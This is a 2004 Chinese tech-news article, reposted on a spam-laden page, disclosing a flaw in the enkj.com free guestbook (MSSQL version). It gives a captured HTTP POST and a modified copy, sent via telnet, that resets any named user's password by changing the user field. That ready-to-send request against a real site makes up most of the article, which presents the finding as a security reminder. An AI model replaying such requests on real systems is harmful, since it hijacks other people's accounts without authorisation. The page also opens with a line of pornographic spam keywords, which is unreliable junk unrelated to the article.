久久―日本道色综合久久,亚洲欧美精品在线,狼狼色丁香久久婷婷综合五月,香蕉人人超,日本网站黄,国产在线观看不卡免费高清,无遮挡的毛片免费

2023信創(chuàng)獨角獸企業(yè)100強
全世界各行各業(yè)聯(lián)合起來,internet一定要實現(xiàn)!

億恩免費留言薄MSSQL版存在漏洞

2004-03-02 eNet&Ciweek

  比如:

  http://enkj.com/gbook/guestbook.asp?user=bingel

  這個是我自己申請用來做測試的免費留言簿

  

  我申請完之后進入修改一下密碼

  

  用winsock expert 捕獲了如下數(shù)據(jù)

  

  POST http://enkj.com/gbook/modifyok.asp HTTP/1.0

  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword,

  

  application/vnd.ms-powerpoint, application/vnd.ms-excel, */*

  Referer: http://enkj.com/gbook/modify.asp?edit=ok

  Accept-Language: zh-cn

  Content-Type: application/x-www-form-urlencoded

  Proxy-Connection: Keep-Alive

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)

  Host: enkj.com

  Content-Length: 122

  Pragma: no-cache

  Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG

  

  user=bingel&pass=123456789&zhanzhang=bingel&kind=1&email=binghen@hotmail.comweb=fuck&url=http%3A%2F%2Fsafdafda.com&intro=

  

  這上面一個是關(guān)鍵的東東.

  

  有了這個東東你就可以修改任意用戶的密碼了

  

  比如你要修改一個用戶名為lin的用戶的留言簿的密碼.只要

  

  telnet enkj.com 80

  

  然后發(fā)送post如下數(shù)據(jù)就可以了.

  

  POST http://enkj.com/gbook/modifyok.asp HTTP/1.0

  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword,

  

  application/vnd.ms-powerpoint, application/vnd.ms-excel, */*

  Referer: http://enkj.com/gbook/modify.asp?edit=ok

  Accept-Language: zh-cn

  Content-Type: application/x-www-form-urlencoded

  Proxy-Connection: Keep-Alive

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)

  Host: enkj.com

  Content-Length: 122

  Pragma: no-cache

  Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG

  

  user=lin&pass=123456789&zhanzhang=bingel&kind=1&email=binghen@hotmail.comweb=fuck&url=http%3A%2F%2Fsafdafda.com&intro=

  

  這樣就把用戶名為lin的用戶的密碼修改為123456789

  

  其它的沒有必要多說,大家看看就知道是怎么回事了.這個漏洞也只是偶然發(fā)現(xiàn).沒有什么技術(shù)可言.只是給大家一個提醒.網(wǎng)絡(luò)上沒有絕對的安全.

  

  

  

相關(guān)頻道: eNews

您對本文或本站有任何意見,請在下方提交,謝謝!

投稿信箱:tougao@enet16.com